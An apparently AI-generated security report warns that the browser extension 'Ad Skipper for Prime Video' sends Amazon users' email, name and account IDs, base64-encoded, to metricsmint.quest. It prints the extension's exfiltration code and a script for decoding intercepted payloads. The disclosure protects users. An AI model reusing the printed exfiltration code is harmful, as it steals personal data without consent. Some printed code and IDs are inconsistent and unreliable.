Is Ad Skipper for Prime Video [QVI] safe?
Ad Skipper for Prime Video is medium risk. On Amazon pages, the extension reads your email, first name, account ID, and profile ID from Amazon's contact page and sends them to metricsmint.quest. Data is base64-encoded, reversible with one call. No consent prompt is shown.
Who publishes itHideApp - 67 other listings from the same operator, 15 of them carrying a finding
HideApp - 67 other listings from the same operator, 15 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
13 other listings published from this account, 194k+ users between them. 2 of them carry a finding.
Same operator - 54 listings
Published under a different store account, but sharing the registered address, contact or declared legal entity this one gave the store.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Amazon account PII transmitted to third-party server in base64 encoding
On Amazon pages, the extension reads your email, first name, account ID, and profile ID from Amazon's contact page and sends them to metricsmint.quest.
Data is base64-encoded, reversible with one call.
No consent prompt is shown.
You open any Amazon or Prime Video page with the extension installed.
The content script runs on all five Amazon regional domains covered by the extension's host permissions.
The extension fetches your Amazon contact page and sends your email address, first name, account ID, and profile ID to metricsmint.quest.
Data is JSON-serialized, base64-encoded, and POSTed to metricsmint.quest/up without a consent prompt.
| Field | Value | Why it matters | |
|---|---|---|---|
Email address | jane.doe@example.com | Your primary Amazon account email, read from the contact page. | |
First name | Jane | Your first name as stored in your Amazon account. | |
Account ID | A3B2C1X9Z7W5V4 | Amazon's internal numeric identifier for your account, unique to you. | |
Profile ID | B01GHJ9KXYZ12345 | Your Amazon profile identifier, used across services like Prime Video watchlists. | |
Amazon domain | amazon.com | The regional Amazon domain you were on when the extension ran. | |
Extension user ID | f3a1b2c4-d5e6-7890-abcd-ef1234567890 | A persistent random ID generated by the extension to track you across sessions. |
The POST body is a single base64 string produced by btoa. Base64 is encoding, not encryption, any party who can see the request (proxy, network observer, the receiving server) can recover the plaintext with one atob call in a browser console.
{
"svod": "amazon",
"accountId": "A3B2C1X9ZW5V4",
"profileId": "B01GHJ9KXYZ12345",
"domain": "amazon.com",
"extension_user_id": "f3a1b2c4-d5e6-7890-abcd-ef1234567890",
"customerModel.email.value": "jane.doe@example.com",
"customerFirstName": "Jane"
}b64encode and the transmission call
var b64encode = function(data) {
if (globalThis.TextEncoder && globalThis.btoa) {
var utf8Data = new TextEncoder.encode(data);
var binaryString = "";
for (var i = 0; i < utf8Data.length; i++) {
binaryString += String.fromCharCode(utf8Data[i]);
}
return btoa(binaryString);
}
var utf8Buffer = buffer.hp.from(data, "utf-8");
return utf8Buffer.toString("base64");
};async function sendAdditionalProfileData(svod, data) {
const response = await fetch(config.d1 /* 'https://metricsmint.quest/up' */, {
method: 'POST',
body: b64encode(JSON.stringify({ svod, ...data }))
});
return response.json;
}- metricsmint.quest
Receives base64-encoded JSON containing Amazon account PII on every extension activation. Not listed as a data processor in the extension's Chrome Web Store privacy disclosure.
Decodes a captured POST body from metricsmint.quest/up and prints the plaintext JSON fields. Run against any intercepted request body to see the PII in clear.
#!/usr/bin/env node
// Decode a captured POST body from metricsmint.quest/up
// Usage: echo '<base64-body>' | node decode-metricsmint-payload.js
// Or: node decode-metricsmint-payload.js <base64-body>
const input = process.argv[2] || require('fs').readFileSync('/dev/stdin', 'utf8').trim;
try {
const decoded = Buffer.from(input, 'base64').toString('utf-8');
const parsed = JSON.parse(decoded);
console.log('Decoded payload:');
console.log(JSON.stringify(parsed, null, 2));
// Highlight PII fields
const piiFields = [
'customerModel.email.value',
'customerFirstName',
'accountId',
'profileId',
'extension_user_id',
];
console.log('\nPII fields present:');
for (const field of piiFields) {
if (parsed[field] !== undefined) {
console.log(` ${field}: ${parsed[field]}`);
}
}
} catch (err) {
console.error('Failed to decode:', err.message);
process.exit(1);
}- 1Intercept the POST to metricsmint.quest/up (proxy or DevTools Network tab).
- 2Copy the raw body string.
- 3Run: echo '<body>' | node decode-metricsmint-payload.js.
- 4It prints the JSON payload with PII fields labeled.